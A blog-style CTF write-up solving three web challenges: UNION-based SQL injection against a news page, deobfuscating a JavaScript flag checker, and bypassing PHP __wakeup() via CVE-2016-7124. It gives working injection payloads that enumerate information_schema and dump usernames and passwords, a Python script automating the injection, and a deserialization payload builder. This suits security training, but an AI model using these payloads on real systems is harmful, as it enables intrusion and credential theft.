Newscenter (SQL Injection, UNION Query) | NaNNaNNaNNaN-Batman | unserialize3 Solutions

Newscenter

Pre-knowledge

information_schema in MySQL

SCHEMATA: SCHEMA_NAME (one row per database)
TABLES: TABLE_SCHEMA, TABLE_NAME (one row per table)
COLUMNS: TABLE_SCHEMA, TABLE_NAME, COLUMN_NAME (one row per column)

UNION Rules in MySQL

1. A UNION combines two or more SELECT statements separated by the keyword UNION.
2. Each SELECT in the UNION must return the same number of columns (with compatible types).
3. UNION removes duplicate rows from the combined result set (UNION ALL keeps them).
4. Precondition for this technique: the page echoes at least one column of the query result, so the injected SELECT has somewhere to display its output.

Steps

1. Determine the number of columns:

order by n
# The page behaves normally while n is at most the number of columns and errors as soon as n exceeds it, so the last working n is the column count

2. Find which columns are echoed (the examples below assume 3 columns; whichever numbers appear on the page mark the usable positions)

union select 1,2,3

3. Get the current database name and the user the application connects as

union select 1,2,database()
union select 1,2,user()

4. List all databases

# limit: print one database name at a time (raise the offset to walk through them)
union select 1,2,schema_name from information_schema.schemata limit 0,1
# group_concat: display all of them at once
union select 1,2,group_concat(schema_name) from information_schema.schemata

5. List all tables in (database: test)

# limit: print one table name at a time
union select 1,2,table_name from information_schema.tables where table_schema='test' limit 0,1
# group_concat: display all of them at once
union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=0x74657374
# Note: a string literal such as 'test' can be written as its hex form 0x74657374, which avoids the single quote when quotes are filtered. (A challenge on the NCCF between 2021-11-26 and 2021-11-27 also required bypassing a single-quote filter.)

6. List all fields in (database: test; table: admin)

# limit: print one column name at a time
union select 1,2,column_name from information_schema.columns where table_schema='test' and table_name='admin' limit 0,1
# group_concat: display all of them at once (0x74657374 = 'test', 0x61646d696e = 'admin')
union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=0x74657374 and table_name=0x61646d696e

7. Dump the data in (database: test; table: admin; fields: username, passwd)

# limit: print one row at a time (a scalar position can only hold one column, so the two fields are joined with concat)
union select 1,2,concat(username,0x20,passwd) from test.admin limit 0,1
# group_concat: display all rows at once
union select 1,2,group_concat(concat(username,0x20,passwd)) from test.admin
# 0x20 is a space, inserted to make the two fields easy to tell apart
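The seven steps above, run end to end against a constructed in-memory database. This is an added example, not code from the writeup: the writeup targets MySQL, but the script uses SQLite so that it runs offline, with sqlite_master and pragma_table_info standing in for information_schema and the -- comment standing in for MySQL's #. The table, column and flag values are made up to mirror the challenge; the ORDER BY oracle, the false-WHERE-plus-UNION extraction and the parameterised fix are the same technique on either engine.

```python
import sqlite3

# Constructed stand-in for the challenge database; table and column names
# mirror the writeup, the flag value is made up.
def make_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT);
        INSERT INTO news VALUES (1, 'hello', 'first post'), (2, 'again', 'second post');
        CREATE TABLE secret_table(id INTEGER, fl4g TEXT);
        INSERT INTO secret_table VALUES (1, 'flag{constructed_example}');
    """)
    return db

def vulnerable_query(db, user_id):
    # The injectable pattern: the parameter is pasted into the SQL text, so a
    # single quote in user_id closes the literal and everything after it is SQL.
    sql = f"SELECT id, title, body FROM news WHERE id = '{user_id}'"
    return db.execute(sql).fetchall()

def safe_query(db, user_id):
    # Parameterised form: the driver sends user_id as data, never as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return db.execute(sql, (user_id,)).fetchall()

def hex_literal(s):
    # MySQL accepts 0x74657374 wherever it accepts 'test', which sidesteps a
    # single-quote filter. SQLite parses 0x.. as an integer, so this helper is
    # only for building MySQL payloads.
    return "0x" + s.encode().hex()

def count_columns(db, max_n=16):
    # ORDER BY n oracle: fine while n <= column count, error as soon as n
    # exceeds it, so the first failing n minus one is the column count.
    for n in range(1, max_n + 1):
        try:
            vulnerable_query(db, f"1' ORDER BY {n} --")
        except sqlite3.OperationalError:
            return n - 1
    return None

def union_extract(db, subquery):
    # 'x' matches no row, so only the UNIONed row comes back; position 3 is the
    # echoed column where the scalar subquery's result lands.
    rows = vulnerable_query(db, f"x' UNION SELECT 1, 2, ({subquery}) --")
    return rows[0][2]

def dump_flag(db):
    # Steps 5 to 7 of the procedure: tables, then columns, then data.
    tables = union_extract(db, "SELECT group_concat(name) FROM sqlite_master WHERE type='table'")
    columns = union_extract(db, "SELECT group_concat(name) FROM pragma_table_info('secret_table')")
    flag = union_extract(db, "SELECT group_concat(fl4g) FROM secret_table")
    return tables, columns, flag

if __name__ == "__main__":
    db = make_db()
    print("columns:", count_columns(db))
    print("tables, columns, flag:", dump_flag(db))
    print("same payload against the parameterised query:",
          safe_query(db, "x' UNION SELECT 1, 2, 3 --"))
```

The last line of the demo is the check a practitioner wants: the identical UNION payload sent through the parameterised query is compared as a literal id and returns no rows, because the quote never reaches the SQL parser.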

Walkthrough

Open the challenge: it is a UNION-based SQL injection. First build a payload to determine the number of columns:

1' order by n #

The page errors at n=4 and is normal at n=3, so the query has 3 columns.
Build a payload to find the echoed columns:

1' union select 1,2,3 #

List all databases:

1' union select 1,2,group_concat(schema_name) from information_schema.schemata #

The page echoes information_schema,news.
List all tables in (database: news):

1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='news' #

The page echoes news,secret_table.
List all columns in (database: news; table: secret_table):

1' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='news' and table_name='secret_table' #

The page echoes id,fl4g, so the flag is evidently in fl4g.
Dump the data in (database: news; table: secret_table; field: fl4g):

1' union select 1,2,group_concat(fl4g) from news.secret_table #

This returns the flag.

NaNNaNNaNNaN-Batman

Pre-knowledge

eval() executes a string as JavaScript code and returns the value of the last expression.
alert() shows a string in a pop-up window instead of executing it. Swapping eval() for alert() in an obfuscated script therefore displays the decoded code at the point where it would have run.

Solving Steps

Download the attachment and unzip it to get a file named web100 with no extension. Do not rush to add one; open it directly in Notepad.

The purpose of the code is not obvious, but it is clearly script. Opening the file in a browser shows only a single input box.

Change eval() to alert() in Notepad and reopen the file in the browser; the pop-up shows the decoded script.

Tidied up, it reads:

function $()
{
var e=document.getElementById("c").value;
if(e.length==16)
	if(e.match(/^be0f23/)!=null)
		if(e.match(/233ac/)!=null)
			if(e.match(/e98aa$/)!=null)
				if(e.match(/c7be9/)!=null)
				{
					var t=["fl","s_a","i","e}"];
					var n=["a","_h0l","n"];
					var r=["g{","e","_0"];
					var i=["it'","_","n"];
					var s=[t,n,r,i];
					for(var o=0;o<13;++o)
					{
						document.write(s[o%4][0]);
						s[o%4].splice(0,1)
					}
				}
}
document.write('<input id="c"><button onclick=$()>Ok</button>');
delete _

There are five checks on the input:
1. Exactly 16 characters long
2. Must begin with be0f23
3. Must contain 233ac and c7be9
4. Must end with e98aa
The fragments overlap (be0f23 and 233ac share "23", 233ac and c7be9 share "c", c7be9 and e98aa share "e9"), which is how four fragments fit into 16 characters. The resulting payload: be0f233ac7be98aa
Finally, change alert() back to eval(), open the file in the browser again and enter the payload in the input box to get the flag.
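The constraint check and the overlap reasoning above, as an added example in Python (not part of the original writeup). The regexes are the five checks from the decoded script; overlap_join builds the candidate by chaining the fragments on their longest suffix/prefix overlap, and reveal_flag is a port of the document.write loop, so the flag is derived from the arrays on the page rather than typed in.

```python
import re

# The five checks from the decoded script, in the order the script tests them.
CHECKS = [
    ("exactly 16 characters", re.compile(r"^.{16}$")),
    ("starts with be0f23", re.compile(r"^be0f23")),
    ("contains 233ac", re.compile(r"233ac")),
    ("ends with e98aa", re.compile(r"e98aa$")),
    ("contains c7be9", re.compile(r"c7be9")),
]

def failed_checks(candidate):
    """Return the descriptions of the checks that candidate fails (empty = accepted)."""
    return [desc for desc, rx in CHECKS if rx.search(candidate) is None]

def overlap_join(parts):
    """Chain fragments left to right, merging each pair on the longest overlap
    between the suffix of what has been built and the prefix of the next part.
    With the four fragments in positional order this yields the 16-byte payload."""
    out = parts[0]
    for nxt in parts[1:]:
        k = min(len(out), len(nxt))
        while k > 0 and not out.endswith(nxt[:k]):
            k -= 1
        out += nxt[k:]
    return out

def reveal_flag():
    """Port of the document.write loop: 13 times, take the first remaining piece
    from arrays t, n, r, i in rotation and print it."""
    s = [["fl", "s_a", "i", "e}"], ["a", "_h0l", "n"], ["g{", "e", "_0"], ["it'", "_", "n"]]
    return "".join(s[o % 4].pop(0) for o in range(13))

if __name__ == "__main__":
    payload = overlap_join(["be0f23", "233ac", "c7be9", "e98aa"])
    print(payload, "fails:", failed_checks(payload))
    print(reveal_flag())
```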

unserialize3

Pre-knowledge

PHP magic methods

PHP treats the following method names as magic methods: __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __serialize(), __unserialize(), __toString(), __invoke(), __set_state(), __clone() and __debugInfo().
Be careful:
1. Except for __construct(), __destruct() and __clone(), all magic methods must be declared public, otherwise an E_WARNING is issued. Before PHP 8.0.0 no diagnostic was emitted for __sleep(), __wakeup(), __serialize(), __unserialize() and __set_state().
2. If type declarations are used when defining a magic method, they must match the signatures in the PHP manual, otherwise a fatal error is raised. Before PHP 8.0.0 no diagnostic was emitted. __construct() and __destruct() must not declare a return type at all, otherwise a fatal error is raised.

__sleep() and __wakeup()
public __sleep(): array
public __wakeup(): void

serialize() checks whether the class has a __sleep() method and, if so, calls it before serializing.
Conversely, unserialize() checks for a __wakeup() method and, if present, calls it right after the object is rebuilt so it can re-establish any resources the object needs.
The full list of magic methods is at https://www.php.net/manual/zh/language.oop5.magic.php

The __wakeup() bypass

The __wakeup() bypass depends on the declared property count. When the serialized string declares more properties than the object actually carries, unserialize() skips __wakeup(). For example, in O:7:"Student":3:{s:9:"full_name";s:8:"zhangsan";s:5:"score";i:150;s:6:"grades";a:0:{}} the 3 after the class name declares that Student has three properties; raising it to 4 while leaving the body alone triggers the bypass. This is CVE-2016-7124, fixed in PHP 5.6.25 and 7.0.10; on current PHP the mismatch makes unserialize() fail instead, so the trick only works against older interpreters such as the one this challenge runs.

Walkthrough

Visit the target URL. From the __wakeup() magic method in the source and the challenge name, you can guess that this is a PHP deserialization challenge.

The complete code shown on the page:

class xctf
{
	public $flag = '111';
	public function __wakeup()
	{
		exit('bad requests');
	}
}
?code=

We know that unserialize() checks for a __wakeup() method and, if present, calls it as soon as the object is rebuilt; here __wakeup() just exits with "bad requests", so we need to bypass it.
First build the normal serialized string with this script:

<?php
class xctf
{
	public $flag = '111';
	public function __wakeup()
	{
		exit('bad requests');
	}
}
$a=new xctf();
echo(serialize($a));
?>

Running it gives O:4:"xctf":1:{s:4:"flag";s:3:"111";}. Using the __wakeup() bypass, change the 1 to 2 and pass the result as the code parameter (?code=O:4:"xctf":2:{s:4:"flag";s:3:"111";}) to get the flag.
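The payload manipulation above, generalised, as an added example in Python (not code from the writeup or from the challenge). make_wakeup_bypass rewrites the declared property count in any serialized object header, and property_counts walks the PHP serialization format (N, i, b, d, s, a, O) to compare the declared count with the number of properties actually present, which is exactly the mismatch the bypass relies on. String lengths are treated as character counts, which matches PHP's byte counts for ASCII data; the Student string from the pre-knowledge section and the xctf string from the walkthrough are used as inputs.

```python
import re

# Header of a serialized PHP object: O:<name length>:"<class>":<property count>:{
OBJ_HEADER = re.compile(r'O:(\d+):"([^"]*)":(\d+):\{')

def make_wakeup_bypass(serialized):
    """Raise the declared property count by one and leave the body untouched.
    On PHP before 5.6.25 / 7.0.10 (CVE-2016-7124) unserialize() then builds the
    object but skips __wakeup(); current PHP rejects the mismatch instead."""
    m = OBJ_HEADER.match(serialized)
    if m is None:
        raise ValueError("not a serialized PHP object")
    declared = int(m.group(3))
    return serialized[:m.start(3)] + str(declared + 1) + serialized[m.end(3):]

def _parse(s, pos):
    """Parse one value starting at pos; return (value, position after it).
    Arrays and objects come back as (declared_count, {key: value})."""
    t = s[pos]
    if t == "N":                                   # N;
        return None, pos + 2
    if t in "ibd":                                 # i:150;  b:1;  d:1.5;
        end = s.index(";", pos)
        conv = {"i": int, "b": lambda v: v == "1", "d": float}[t]
        return conv(s[pos + 2:end]), end + 1
    if t == "s":                                   # s:4:"flag";
        colon = s.index(":", pos + 2)
        length = int(s[pos + 2:colon])
        start = colon + 2                          # skip :"
        if s[start + length:start + length + 2] != '";':
            raise ValueError(f"string length does not match data at {pos}")
        return s[start:start + length], start + length + 2
    if t in "aO":                                  # a:0:{}   O:4:"xctf":1:{...}
        if t == "O":
            m = OBJ_HEADER.match(s, pos)
            if m is None:
                raise ValueError(f"bad object header at {pos}")
            declared, body = int(m.group(3)), m.end()
        else:
            colon = s.index(":", pos + 2)
            declared, body = int(s[pos + 2:colon]), colon + 2
        items, p = {}, body
        while s[p] != "}":                         # key/value pairs until the closing brace
            key, p = _parse(s, p)
            val, p = _parse(s, p)
            items[key] = val
        return (declared, items), p + 1
    raise ValueError(f"unsupported type {t!r} at {pos}")

def property_counts(serialized):
    """Return (declared property count, properties actually present in the body)."""
    (declared, props), end = _parse(serialized, 0)
    if end != len(serialized):
        raise ValueError("trailing data after the object")
    return declared, len(props)

if __name__ == "__main__":
    normal = 'O:4:"xctf":1:{s:4:"flag";s:3:"111";}'
    bypass = make_wakeup_bypass(normal)
    print(bypass, property_counts(bypass))
```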

Posted on Sun, 05 Dec 2021 18:06:02 -0500 by zysac